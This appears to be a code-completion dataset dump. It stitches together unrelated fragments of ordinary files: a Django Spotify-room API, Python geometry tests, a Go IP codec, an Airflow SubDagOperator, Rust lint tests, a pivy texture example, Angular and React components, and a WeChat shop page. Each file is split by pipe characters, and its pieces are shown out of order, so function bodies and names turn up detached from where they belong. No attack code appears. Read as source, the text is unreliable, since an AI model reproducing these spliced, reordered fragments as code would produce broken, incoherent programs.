if not request.session.exists(request.session.session_key):
request.session.create()
update_or_create_user_tokens(
request.session.session_key, access_token, token_type, expires_in, refresh_token)
return redirect('frontend:')
class IsAuthenticated(APIView):
def get(self, request, format=None):
is_authenticated = is_spotify_authenticated(
self.request.session.session_key)
return Response({'status': is_authenticated}, status=status.HTTP_200_OK)
class CurrentSong(APIView):
def get(self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)
if room.exists():
room = room[0]
else:
return Response({}, status=status.HTTP_404_NOT_FOUND)
host = room.host
endpoint = "player/currently-playing"
response = execute_spotify_api_request(host, endpoint)
if 'error' in response or 'item' not in response:
return Response({}, status=status.HTTP_204_NO_CONTENT)
item = response.get('item')
duration = item.get('duration_ms')
progress = response.get('progress_ms')
album_cover = item.get('album').get('images')[0].get('url')
is_playing = response.get('is_playing')
song_id = item.get('id')
artist_string = ""
for i, artist in enumerate(item.get('artists')):
if i > 0:
artist_string += ", "
name = artist.get('name')
artist_string += name
votes = len(Vote.objects.filter(room=room, song_id=song_id))
song = {
'title': item.get('name'),
'artist': artist_string,
'duration': duration,
'time': progress,
'image_url': album_cover,
'is_playing': is_playing,
'votes': votes,
'votes_required': room.votes_to_skip,
'id': song_id
}
self.update_room_song(room, song_id)
return Response(song, status=status.HTTP_200_OK)
def update_room_song(self, room, song_id):
current_song = room.current_song
if current_song != song_id:
room.current_song = song_id
room.save(update_fields=['current_song'])
Vote.objects.filter(room=room).delete()
class PauseSong(APIView):
def put(self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
if self.request.session.session_key == room.host or room.guest_can_pause:
pause_song(room.host)
return Response({}, status=status.HTTP_204_NO_CONTENT)
return Response({}, status=status.HTTP_403_FORBIDDEN)
class PlaySong(APIView):
def put(self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
if self.request.session.session_key == room.host or room.guest_can_pause:
play_song(room.host)
return Response({}, status=status.HTTP_204_NO_CONTENT)
return Response({}, status=status.HTTP_403_FORBIDDEN)
class SkipSong(APIView):
def | (self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
votes = Vote.objects.filter(room=room, song_id=room.current_song)
votes_needed = room.votes_to_skip
if self.request.session.session_key == room.host or len(votes) + 1 >= votes_needed:
votes.delete()
skip_song(room.host)
else:
vote = Vote(user=self.request.session.session_key,
room=room, song_id=room.current_song)
vote.save()
return Response({}, status.HTTP_204_NO_CONTENT)
| post |
tests.py | from mapping.map import Map
from utils.position import Position
from utils.utils import bresenham_line, filled_midpoint_circle
import matplotlib.pyplot as plt
def map_to_grid_pos():
print('Test: map_to_grid_pos')
lower_left_pos = Position(-5.0, -5.0)
upper_right_pos = Position(5.0, 5.0)
test_map = Map(lower_left_pos, upper_right_pos, 2.0)
assert(test_map.grid.shape == (20, 20))
grid_pos = test_map.to_grid_pos(Position(-5, -5))
assert(grid_pos.x == 0 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(-4.5, -5))
assert(grid_pos.x == 1 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(-4.501, -5))
assert(grid_pos.x == 0 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(5, 5))
assert(grid_pos.x == 20 and grid_pos.y == 20)
grid_pos = test_map.to_grid_pos(Position(4.99, 4.99))
assert(grid_pos.x == 19 and grid_pos.y == 19)
print('OK')
def map_to_real_pos():
print('Test: map_to_real_pos')
lower_left_pos = Position(-5.0, -5.0)
upper_right_pos = Position(5.0, 5.0)
test_map = Map(lower_left_pos, upper_right_pos, 2.0)
assert(test_map.grid.shape == (20, 20))
real_pos = test_map.to_real_pos(Position(0, 0))
assert(real_pos.x == -5 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(1, 0))
assert(real_pos.x == -4.5 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(2, 0))
assert(real_pos.x == -4 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(20, 20))
assert(real_pos.x == 5 and real_pos.y == 5)
real_pos = test_map.to_real_pos(Position(19, 19))
assert(real_pos.x == 4.5 and real_pos.y == 4.5)
print('OK')
def utils_bresenham_line():
print('Test: utils_bresenham_line')
line = bresenham_line(0, 0, 5, 5)
assert(line[0].x == 0 and line[0].y == 0)
assert(line[1].x == 1 and line[1].y == 1)
assert(line[2].x == 2 and line[2].y == 2)
assert(line[3].x == 3 and line[3].y == 3)
assert(line[4].x == 4 and line[4].y == 4)
assert(line[5].x == 5 and line[5].y == 5)
line = bresenham_line(5, 5, 0, 0)
assert(line[0].x == 5 and line[0].y == 5)
assert(line[1].x == 4 and line[1].y == 4)
assert(line[2].x == 3 and line[2].y == 3)
assert(line[3].x == 2 and line[3].y == 2)
assert(line[4].x == 1 and line[4].y == 1)
assert(line[5].x == 0 and line[5].y == 0)
line = bresenham_line(2, 5, 8, 9)
assert(line[0].x == 2 and line[0].y == 5)
assert(line[1].x == 3 and line[1].y == 6)
assert(line[2].x == 4 and line[2].y == 6)
assert(line[3].x == 5 and line[3].y == 7)
assert(line[4].x == 6 and line[4].y == 8)
assert(line[5].x == 7 and line[5].y == 8)
assert(line[6].x == 8 and line[6].y == 9)
print('OK')
def utils_filled_midpoint_circle():
print('Test: utils_filled_midpoint_circle')
circle = filled_midpoint_circle(5, 5, 5)
result = [' x: 0 y: 5',
' x: 1 y: 5',
' x: 2 y: 5',
' x: 3 y: 5',
' x: 4 y: 5',
' x: 5 y: 5',
' x: 6 y: 5',
' x: 7 y: 5',
' x: 8 y: 5',
' x: 9 y: 5',
' x: 10 y: 5',
' x: 0 y: 6',
' x: 1 y: 6',
' x: 2 y: 6',
' x: 3 y: 6',
' x: 4 y: 6',
' x: 5 y: 6',
' x: 6 y: 6',
' x: 7 y: 6',
' x: 8 y: 6',
' x: 9 y: 6',
' x: 10 y: 6',
' x: 0 y: 4',
' x: 1 y: 4',
' x: 2 y: 4',
' x: 3 y: 4',
' x: 4 y: 4',
' x: 5 y: 4',
' x: 6 y: 4',
' x: 7 y: 4',
' x: 8 y: 4',
' x: 9 y: 4',
' x: 10 y: 4',
' x: 0 y: 7',
' x: 1 y: 7',
' x: 2 y: 7',
' x: 3 y: 7',
' x: 4 y: 7',
' x: 5 y: 7',
' x: 6 y: 7',
' x: 7 y: 7',
' x: 8 y: 7',
' x: 9 y: 7',
' x: 10 y: 7',
' x: 0 y: 3',
' x: 1 y: 3',
' x: 2 y: 3',
' x: 3 y: 3',
' x: 4 y: 3',
' x: 5 y: 3',
' x: 6 y: 3',
' x: 7 y: 3',
' x: 8 y: 3',
' x: 9 y: 3',
' x: 10 y: 3',
' x: 3 y: 10',
' x: 3 y: 0',
' x: 4 y: 10',
' x: 4 y: 0',
' x: 5 y: 10',
' x: 5 y: 0',
' x: 6 y: 10',
' x: 6 y: 0',
' x: 7 y: 10',
' x: 7 y: 0',
' x: 1 y: 8',
' x: 2 y: 8',
' x: 3 y: 8',
' x: 4 y: 8',
' x: 5 y: 8',
' x: 6 y: 8',
' x: 7 y: 8',
' x: 8 y: 8',
' x: 9 y: 8',
' x: 1 y: 2', | ' x: 5 y: 2',
' x: 6 y: 2',
' x: 7 y: 2',
' x: 8 y: 2',
' x: 9 y: 2',
' x: 2 y: 9',
' x: 2 y: 1',
' x: 3 y: 9',
' x: 3 y: 1',
' x: 4 y: 9',
' x: 4 y: 1',
' x: 5 y: 9',
' x: 5 y: 1',
' x: 6 y: 9',
' x: 6 y: 1',
' x: 7 y: 9',
' x: 7 y: 1',
' x: 8 y: 9',
' x: 8 y: 1']
for i in range(len(circle)):
assert(str(circle[i]) == result[i])
print('OK')
def position_properties():
print('Test: position_properties')
pos_1 = Position(x=1, y=2, angle=4)
pos_2 = Position(x=1, y=2, angle=4)
pos_3 = Position(x=1, angle=4, z=5, y=2)
assert(str(pos_1) == ' x: 1 y: 2 angle: 4')
assert(str(pos_2) == ' x: 1 y: 2 angle: 4')
assert(str(pos_3) == ' x: 1 y: 2 z: 5 angle: 4')
assert(pos_1 == pos_2)
assert(pos_1 != pos_3)
assert(pos_2 != pos_3)
poses = set([])
assert(len(poses) == 0)
poses.add(pos_1)
assert(len(poses) == 1)
poses.add(pos_3)
assert(len(poses) == 2)
poses.add(pos_2)
assert(len(poses) == 2)
print('OK')
if __name__ == '__main__':
map_to_grid_pos()
map_to_real_pos()
utils_bresenham_line()
utils_filled_midpoint_circle()
position_properties()
print('End of tests')
print('OK') | ' x: 2 y: 2',
' x: 3 y: 2',
' x: 4 y: 2', |
codec.go | package banman
import (
"io"
"net"
)
// ipType represents the different types of IP addresses supported by the
// BanStore interface.
type ipType = byte
const (
// ipv4 represents an IP address of type IPv4.
ipv4 ipType = 0
// ipv6 represents an IP address of type IPv6.
ipv6 ipType = 1
)
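// Note on the serialized layout implied by the helpers below: a single ipType
// byte, followed by the raw IP bytes and then the mask bytes, each group being
// 4 bytes for IPv4 and 16 bytes for IPv6.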
// encodeIPNet serializes the IP network into the given writer.
func encodeIPNet(w io.Writer, ipNet *net.IPNet) error |
// decodeIPNet deserializes an IP network from the given reader.
func decodeIPNet(r io.Reader) (*net.IPNet, error) {
// Read the IP address type and determine whether it is supported.
var ipType [1]byte
if _, err := r.Read(ipType[:]); err != nil {
return nil, err
}
var ipLen int
switch ipType[0] {
case ipv4:
ipLen = net.IPv4len
case ipv6:
ipLen = net.IPv6len
default:
return nil, ErrUnsupportedIP
}
// Once we have the type and its corresponding length, attempt to read
// it and its mask.
ip := make([]byte, ipLen)
if _, err := r.Read(ip); err != nil {
return nil, err
}
mask := make([]byte, ipLen)
if _, err := r.Read(mask); err != nil {
return nil, err
}
return &net.IPNet{IP: ip, Mask: mask}, nil
}
| {
// Determine the appropriate IP type for the IP address contained in the
// network.
var (
ip []byte
ipType ipType
)
switch {
case ipNet.IP.To4() != nil:
ip = ipNet.IP.To4()
ipType = ipv4
case ipNet.IP.To16() != nil:
ip = ipNet.IP.To16()
ipType = ipv6
default:
return ErrUnsupportedIP
}
// Write the IP type first in order to properly identify it when
// deserializing it, followed by the IP itself and its mask.
if _, err := w.Write([]byte{ipType}); err != nil {
return err
}
if _, err := w.Write(ip); err != nil {
return err
}
if _, err := w.Write([]byte(ipNet.Mask)); err != nil {
return err
}
return nil
} |
subdag.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The module which provides a way to nest your DAGs and so your levels of complexity."""
from enum import Enum
from typing import Dict, Optional
from sqlalchemy.orm.session import Session
from airflow.api.common.experimental.get_task_instance import get_task_instance
from airflow.exceptions import AirflowException, TaskInstanceNotFound
from airflow.models import DagRun
from airflow.models.dag import DAG, DagContext
from airflow.models.pool import Pool
from airflow.models.taskinstance import TaskInstance
from airflow.sensors.base import BaseSensorOperator
from airflow.utils.decorators import apply_defaults
from airflow.utils.session import create_session, provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class SkippedStatePropagationOptions(Enum):
"""Available options for skipped state propagation of subdag's tasks to parent dag tasks."""
ALL_LEAVES = 'all_leaves'
ANY_LEAF = 'any_leaf'
class SubDagOperator(BaseSensorOperator):
"""
This runs a sub dag. By convention, a sub dag's dag_id
should be prefixed by its parent and a dot. As in `parent.child`.
Although SubDagOperator can occupy a pool/concurrency slot,
you can specify mode=reschedule so that the slot will be
released periodically to avoid potential deadlock.
:param subdag: the DAG object to run as a subdag of the current DAG.
:param session: sqlalchemy session
:param conf: Configuration for the subdag
:type conf: dict
:param propagate_skipped_state: by setting this argument you can define
whether the skipped state of leaf task(s) should be propagated to the
parent dag's downstream task.
"""
ui_color = '#555'
ui_fgcolor = '#fff'
@provide_session
@apply_defaults
def __init__(
self,
*,
subdag: DAG,
session: Optional[Session] = None,
conf: Optional[Dict] = None,
propagate_skipped_state: Optional[SkippedStatePropagationOptions] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.subdag = subdag
self.conf = conf
self.propagate_skipped_state = propagate_skipped_state
self._validate_dag(kwargs)
self._validate_pool(session)
def _validate_dag(self, kwargs):
dag = kwargs.get('dag') or DagContext.get_current_dag()
if not dag:
raise AirflowException('Please pass in the `dag` param or call within a DAG context manager')
if dag.dag_id + '.' + kwargs['task_id'] != self.subdag.dag_id:
raise AirflowException(
"The subdag's dag_id should have the form '{{parent_dag_id}}.{{this_task_id}}'. "
"Expected '{d}.{t}'; received '{rcvd}'.".format(
d=dag.dag_id, t=kwargs['task_id'], rcvd=self.subdag.dag_id
)
)
def _validate_pool(self, session):
if self.pool:
conflicts = [t for t in self.subdag.tasks if t.pool == self.pool]
if conflicts:
# only query for pool conflicts if one may exist
pool = session.query(Pool).filter(Pool.slots == 1).filter(Pool.pool == self.pool).first()
if pool and any(t.pool == self.pool for t in self.subdag.tasks):
raise AirflowException(
'SubDagOperator {sd} and subdag task{plural} {t} both '
'use pool {p}, but the pool only has 1 slot. The '
'subdag tasks will never run.'.format(
sd=self.task_id,
plural='s' if len(conflicts) > 1 else '',
t=', '.join(t.task_id for t in conflicts),
p=self.pool,
)
)
def _get_dagrun(self, execution_date):
dag_runs = DagRun.find(
dag_id=self.subdag.dag_id,
execution_date=execution_date,
)
return dag_runs[0] if dag_runs else None
def _reset_dag_run_and_task_instances(self, dag_run, execution_date):
|
def pre_execute(self, context):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date)
if dag_run is None:
dag_run = self.subdag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=execution_date,
state=State.RUNNING,
conf=self.conf,
external_trigger=True,
)
self.log.info("Created DagRun: %s", dag_run.run_id)
if 'notification_server_uri' in context and context['notification_server_uri']:
from airflow.events.scheduler_events import DagRunCreatedEvent
from notification_service.client import NotificationClient
dag_run_created_event = DagRunCreatedEvent(
dag_id=self.subdag.dag_id,
execution_date=dag_run.execution_date
).to_event()
try:
client = NotificationClient(server_uri=context['notification_server_uri'],
default_namespace=dag_run_created_event.namespace,
sender=dag_run_created_event.sender)
self.log.info("SubDagOperator sending event: {}".format(dag_run_created_event))
client.send_event(dag_run_created_event)
finally:
client.close()
else:
self.log.info("Found existing DagRun: %s", dag_run.run_id)
if dag_run.state == State.FAILED:
self._reset_dag_run_and_task_instances(dag_run, execution_date)
def poke(self, context):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date=execution_date)
return dag_run.state != State.RUNNING
def post_execute(self, context, result=None):
execution_date = context['execution_date']
dag_run = self._get_dagrun(execution_date=execution_date)
self.log.info("Execution finished. State is %s", dag_run.state)
if dag_run.state != State.SUCCESS:
raise AirflowException(f"Expected state: SUCCESS. Actual state: {dag_run.state}")
if self.propagate_skipped_state and self._check_skipped_states(context):
self._skip_downstream_tasks(context)
def _check_skipped_states(self, context):
leaves_tis = self._get_leaves_tis(context['execution_date'])
if self.propagate_skipped_state == SkippedStatePropagationOptions.ANY_LEAF:
return any(ti.state == State.SKIPPED for ti in leaves_tis)
if self.propagate_skipped_state == SkippedStatePropagationOptions.ALL_LEAVES:
return all(ti.state == State.SKIPPED for ti in leaves_tis)
raise AirflowException(
f'Unimplemented SkippedStatePropagationOptions {self.propagate_skipped_state} used.'
)
def _get_leaves_tis(self, execution_date):
leaves_tis = []
for leaf in self.subdag.leaves:
try:
ti = get_task_instance(
dag_id=self.subdag.dag_id, task_id=leaf.task_id, execution_date=execution_date
)
leaves_tis.append(ti)
except TaskInstanceNotFound:
continue
return leaves_tis
def _skip_downstream_tasks(self, context):
self.log.info(
'Skipping downstream tasks because propagate_skipped_state is set to %s '
'and skipped task(s) were found.',
self.propagate_skipped_state,
)
downstream_tasks = context['task'].downstream_list
self.log.debug('Downstream task_ids %s', downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['execution_date'], downstream_tasks)
self.log.info('Done.')
| """
Set the DagRun state to RUNNING and set the failed TaskInstances to None state
for scheduler to pick up.
:param dag_run: DAG run
:param execution_date: Execution date
:return: None
"""
with create_session() as session:
dag_run.state = State.RUNNING
session.merge(dag_run)
failed_task_instances = (
session.query(TaskInstance)
.filter(TaskInstance.dag_id == self.subdag.dag_id)
.filter(TaskInstance.execution_date == execution_date)
.filter(TaskInstance.state.in_([State.FAILED, State.UPSTREAM_FAILED]))
)
for task_instance in failed_task_instances:
task_instance.state = State.NONE
session.merge(task_instance)
session.commit() |
lints.rs | use funcmap::FuncMap;
#[test]
fn non_camel_case_types_lint_is_allowed_on_derived_impl() {
#![deny(non_camel_case_types)]
#[allow(non_camel_case_types)]
#[derive(FuncMap)]
struct Test<t>(t);
}
#[test]
fn unused_qualifications_lint_is_allowed_on_derived_impl() {
#![deny(unused_qualifications)]
#[allow(unused_qualifications)]
#[derive(FuncMap)]
struct Test<T>(core::option::Option<T>);
}
#[test]
fn deprecated_lint_is_allowed_on_derived_impl() {
#![deny(deprecated)]
#[deprecated]
#[derive(FuncMap)]
struct Deprecated<T>(T);
#[allow(deprecated)]
#[derive(FuncMap)]
struct Test<T>(Deprecated<T>);
}
#[test]
fn drop_bounds_lint_is_allowed_on_derived_impl() {
#![deny(drop_bounds)]
#[allow(drop_bounds)]
#[derive(FuncMap)]
struct Test<T>(T)
where
T: Drop;
}
#[test]
fn dyn_drop_lint_is_allowed_on_derived_impl() {
#![deny(dyn_drop)]
#[allow(dyn_drop)] | #[derive(FuncMap)]
struct Test<T>(T)
where
for<'a> &'a dyn Drop: Copy;
}
#[test]
fn clippy_disallowed_method_lint_is_allowed_on_derived_impl() {
#![deny(clippy::disallowed_method)]
// methods `func_map` and `func_map_over` are disallowed via `clippy.toml`
#[allow(clippy::disallowed_method)]
#[derive(FuncMap)]
struct Test<T>(Option<T>);
}
#[test]
fn clippy_disallowed_type_lint_is_allowed_on_derived_impl() {
#![deny(clippy::disallowed_type)]
// type `Option` is disallowed via `clippy.toml`
#[allow(clippy::disallowed_type)]
#[derive(FuncMap)]
struct Test<T>(Option<T>);
} | #[allow(trivial_bounds)] |
07.2.TextureCoordinates.py | #!/usr/bin/env python
###
# Copyright (c) 2002-2007 Systems in Motion
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
###
# This is an example from the Inventor Mentor
# chapter 7, example 2.
#
# This example illustrates using texture coordinates on
# a Face Set.
#
import sys
from pivy.coin import *
from pivy.sogui import *
# set this variable to 0 if you want to use the other method
IV_STRICT = 1
def main():
# Initialize Inventor and Qt
myWindow = SoGui.init(sys.argv[0])
if myWindow == None: sys.exit(1)
root = SoSeparator()
# Choose a texture
brick = SoTexture2()
root.addChild(brick)
brick.filename = "brick.1.rgb"
if IV_STRICT:
# This is the preferred code for Inventor 2.1
# Using the new SoVertexProperty node is more efficient
myVertexProperty = SoVertexProperty()
# Define the square's spatial coordinates
myVertexProperty.vertex.set1Value(0, SbVec3f(-3, -3, 0))
myVertexProperty.vertex.set1Value(1, SbVec3f( 3, -3, 0)) |
# Define the square's normal
myVertexProperty.normal.set1Value(0, SbVec3f(0, 0, 1))
# Define the square's texture coordinates
myVertexProperty.texCoord.set1Value(0, SbVec2f(0, 0))
myVertexProperty.texCoord.set1Value(1, SbVec2f(1, 0))
myVertexProperty.texCoord.set1Value(2, SbVec2f(1, 1))
myVertexProperty.texCoord.set1Value(3, SbVec2f(0, 1))
# SoTextureCoordinateBinding node is now obsolete--in Inventor 2.1,
# texture coordinates will always be generated if none are
# provided.
#
# tBind = SoTextureCoordinateBinding()
# root.addChild(tBind)
# tBind.value(SoTextureCoordinateBinding.PER_VERTEX)
#
# Define normal binding
myVertexProperty.normalBinding = SoNormalBinding.OVERALL
# Define a FaceSet
myFaceSet = SoFaceSet()
root.addChild(myFaceSet)
myFaceSet.numVertices.set1Value(0, 4)
myFaceSet.vertexProperty.setValue(myVertexProperty)
else:
# Define the square's spatial coordinates
coord = SoCoordinate3()
root.addChild(coord)
coord.point.set1Value(0, SbVec3f(-3, -3, 0))
coord.point.set1Value(1, SbVec3f( 3, -3, 0))
coord.point.set1Value(2, SbVec3f( 3, 3, 0))
coord.point.set1Value(3, SbVec3f(-3, 3, 0))
# Define the square's normal
normal = SoNormal()
root.addChild(normal)
normal.vector.set1Value(0, SbVec3f(0, 0, 1))
# Define the square's texture coordinates
texCoord = SoTextureCoordinate2()
root.addChild(texCoord)
texCoord.point.set1Value(0, SbVec2f(0, 0))
texCoord.point.set1Value(1, SbVec2f(1, 0))
texCoord.point.set1Value(2, SbVec2f(1, 1))
texCoord.point.set1Value(3, SbVec2f(0, 1))
# Define normal binding
nBind = SoNormalBinding()
root.addChild(nBind)
nBind.value = SoNormalBinding.OVERALL
# SoTextureCoordinateBinding node is now obsolete--in Inventor 2.1,
# texture coordinates will always be generated if none are
# provided.
#
# tBind = SoTextureCoordinateBinding()
# root.addChild(tBind)
# tBind.value.setValue(SoTextureCoordinateBinding.PER_VERTEX)
#
# Define a FaceSet
myFaceSet = SoFaceSet()
root.addChild(myFaceSet)
myFaceSet.numVertices.set1Value(0, 4)
myViewer = SoGuiExaminerViewer(myWindow)
myViewer.setSceneGraph(root)
myViewer.setTitle("Texture Coordinates")
# In Inventor 2.1, if the machine does not have hardware texture
# mapping, we must override the default drawStyle to display textures.
# myViewer.setDrawStyle(SoGuiViewer.STILL, SoGuiViewer.VIEW_AS_IS)
myViewer.show()
SoGui.show(myWindow)
SoGui.mainLoop()
if __name__ == "__main__":
main() | myVertexProperty.vertex.set1Value(2, SbVec3f( 3, 3, 0))
myVertexProperty.vertex.set1Value(3, SbVec3f(-3, 3, 0)) |
products.component.ts | import { Component , OnInit } from '@angular/core';
import { AppService } from './app.service';
import { Router , ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs/Observable';
import { Title } from '@angular/platform-browser';
import { ToastsManager } from 'ng2-toastr/ng2-toastr';
import { Product } from './viewModels/product';
@Component({
moduleId:module.id,
selector:'',
templateUrl:'./products.component.html'
})
export class ProductsComponent implements OnInit{
products$:Observable<Array<Product>>;
categoryID:string;
constructor( private title:Title , private appService:AppService , private router:Router ,
private route:ActivatedRoute , private toaster:ToastsManager) { }
ngOnInit()
{
//let categoryID;
this.route.params.forEach( (params) => {
this.categoryID = params['id'];
this.title.setTitle(this.categoryID);
this.products$ = this.appService.GetProducts(this.categoryID);
});
} |
} | |
test-table.tsx | import classNames from 'classnames';
import { TestRow } from '@teambit/ui.test-row';
import { timeFormat } from '@teambit/time.time-format';
import React from 'react';
import { Icon } from '@teambit/evangelist.elements.icon';
import { TestsFiles, TestResult } from '@teambit/tester';
import { TestFileTitle } from './test-file-title';
import { getStatusIcon } from './utils';
import styles from './test-table.module.scss';
export type TestTableProps = {
testResults: TestsFiles[];
} & React.HTMLAttributes<HTMLDivElement>;
export function TestTable({ testResults }: TestTableProps) {
if (!testResults || testResults.length === 0) return null;
return (
<>
{testResults.map((testFile, index) => {
const testHasErrors = testFile?.error?.failureMessage;
const borderColor = testFile.failed > 0 || testHasErrors ? '#e62e5c' : '#37b26c';
return (
<div key={index} className={styles.testTable}>
<TestFileTitle style={{ borderColor }} testFile={testFile} />
{testHasErrors && <TestSuiteError key={testHasErrors} name={testFile.file} error={testHasErrors} />}
{!testHasErrors &&
testFile.tests.map((test) => {
return <TestLine key={test.name} test={test} />;
})}
</div>
);
})}
</>
);
}
|
return (
<TestRow className={classNames(styles.testRow, styles[test.status])} content={test.error}>
<div className={styles.testTitle}>
<div className={styles.test}>
{getStatusIcon(test.status)}
<TestBreadcrumbs test={test} />
</div>
<div className={styles.duration}>
<span>{duration}</span>
<Icon of="clock" />
</div>
</div>
</TestRow>
);
}
function TestSuiteError({ name, error }: { name: string; error: string }) {
return (
<TestRow className={classNames(styles.testRow, styles.failed)} content={error}>
<div className={styles.testTitle}>
<div className={styles.test}>
{getStatusIcon('failed')}
<div>{name}</div>
</div>
</div>
</TestRow>
);
}
function TestBreadcrumbs({ test }: { test: TestResult }) {
if (test.status === 'failed') {
const nameIndentVal = test.ancestor.length * 8;
return (
<div className={classNames(styles.testBreadcrumbs)}>
{test.ancestor.map((a) => {
const indentVal = test.ancestor.indexOf(a) * 8;
return <div style={{ paddingLeft: `${indentVal}px` }} key={a}>{`${a}`}</div>;
})}
<div style={{ paddingLeft: `${nameIndentVal}px` }}>{test.name}</div>
</div>
);
}
return (
<div className={classNames(styles.testBreadcrumbs, styles.singleLine)}>
{test.ancestor.map((a) => {
return <span key={a}>{`${a} > `}</span>;
})}
<div>{test.name}</div>
</div>
);
} | function TestLine({ test }: { test: TestResult }) {
const duration = test.duration && timeFormat(+test.duration); |
shop.js | if (typeof wx === 'undefined') var wx = getApp().core;
var utils = getApp().helper;
var app = getApp();
var api = getApp().api;
var quickNavigation = require('./../../components/quick-navigation/quick-navigation.js');
Page({
/**
* 页面的初始数据
| data: {
tab: 1,
sort: 1,
coupon_list: [],
copy: false,
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function(options) {
getApp().page.onLoad(this, options);
quickNavigation.init(this);
var self = this;
if (typeof my === 'undefined') {
if (options.scene) {
var scene = decodeURIComponent(options.scene);
if (scene) {
scene = utils.scene_decode(scene);
if (scene.mch_id) {
options.mch_id = scene.mch_id;
}
}
}
} else {
if (getApp().query !== null) {
var query = getApp().query;
getApp().query = null;
options.mch_id = query.mch_id;
}
}
self.setData({
tab: options.tab || 1,
sort: options.sort || 1,
mch_id: options.mch_id || false,
cat_id: options.cat_id || '',
});
if (!self.data.mch_id) {
getApp().core.showModal({
title: '提示',
content: '店铺不存在!店铺id为空'
});
}
setInterval(function() {
self.onScroll();
}, 40);
this.getShopData();
},
quickNavigation: function() {
var status = 0;
this.setData({
quick_icon: !this.data.quick_icon
})
var store = this.data.store;
var animationPlus = getApp().core.createAnimation({
duration: 300,
timingFunction: 'ease-out',
});
var x = -55;
if (!this.data.quick_icon) {
animationPlus.translateY(x).opacity(1).step();
} else {
animationPlus.opacity(0).step();
}
this.setData({
animationPlus: animationPlus.export(),
});
},
/**
* 生命周期函数--监听页面初次渲染完成
*/
onReady: function() {
getApp().page.onReady(this);
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function() {
getApp().page.onShow(this);
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function() {
getApp().page.onHide(this);
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function() {
getApp().page.onUnload(this);
},
/**
* 页面相关事件处理函数--监听用户下拉动作
*/
onPullDownRefresh: function() {
},
/**
* 页面上拉触底事件的处理函数
*/
onReachBottom: function() {
var self = this;
self.getGoodsList();
},
/**
* 用户点击右上角分享
*/
onShareAppMessage: function () {
getApp().page.onShareAppMessage(this);
var self = this;
var user_info = getApp().getUser();
return {
path: "/mch/shop/shop?user_id=" + user_info.id + 'mch_id=' + self.data.mch_id,
title: self.data.shop ? self.data.shop.name : '商城首页',
};
},
kfuStart: function() {
this.setData({
copy: true,
})
},
kfuEnd: function() {
this.setData({
copy: false,
})
},
copyinfo: function(e) {
getApp().core.setClipboardData({
data: e.target.dataset.info,
success: function(res) {
getApp().core.showToast({
title: '复制成功!',
icon: 'success',
duration: 2000,
mask: true
})
}
});
},
callPhone: function(e) {
getApp().core.makePhoneCall({
phoneNumber: e.target.dataset.info
})
},
onScroll: function(e) {
var self = this;
getApp().core.createSelectorQuery().selectViewport('.after-navber').scrollOffset(function(res) {
var limit = self.data.tab == 2 ? 136.5333 : 85.3333;
if (res.scrollTop >= limit) {
self.setData({
fixed: true,
});
} else {
self.setData({
fixed: false,
});
}
}).exec();
},
getShopData: function() {
var self = this;
var current_page = self.data.current_page || 0;
var target_page = current_page + 1;
var cache_key = 'shop_data_mch_id_' + self.data.mch_id;
var cache_data = getApp().core.getStorageSync(cache_key);
if (cache_data) {
self.setData({
shop: cache_data.shop,
});
}
getApp().core.showNavigationBarLoading();
self.setData({
loading: true,
});
getApp().request({
url: getApp().api.mch.shop,
data: {
mch_id: self.data.mch_id,
tab: self.data.tab,
sort: self.data.sort,
page: target_page,
cat_id: self.data.cat_id,
},
success: function(res) {
if (res.code == 1) {
getApp().core.showModal({
title: '提示',
content: res.msg,
showCancel: false,
success: function(e) {
if (e.confirm) {
getApp().core.redirectTo({
url: '/pages/index/index',
});
}
}
});
return;
}
if (res.code == 0) {
self.setData({
shop: res.data.shop,
coupon_list: res.data.coupon_list,
hot_list: res.data.goods_list,
goods_list: res.data.goods_list,
new_list: res.data.new_list,
current_page: target_page,
cs_icon: res.data.shop.cs_icon,
});
getApp().core.setStorageSync(cache_key, res.data);
}
},
complete: function() {
getApp().core.hideNavigationBarLoading();
self.setData({
loading: false,
});
}
});
},
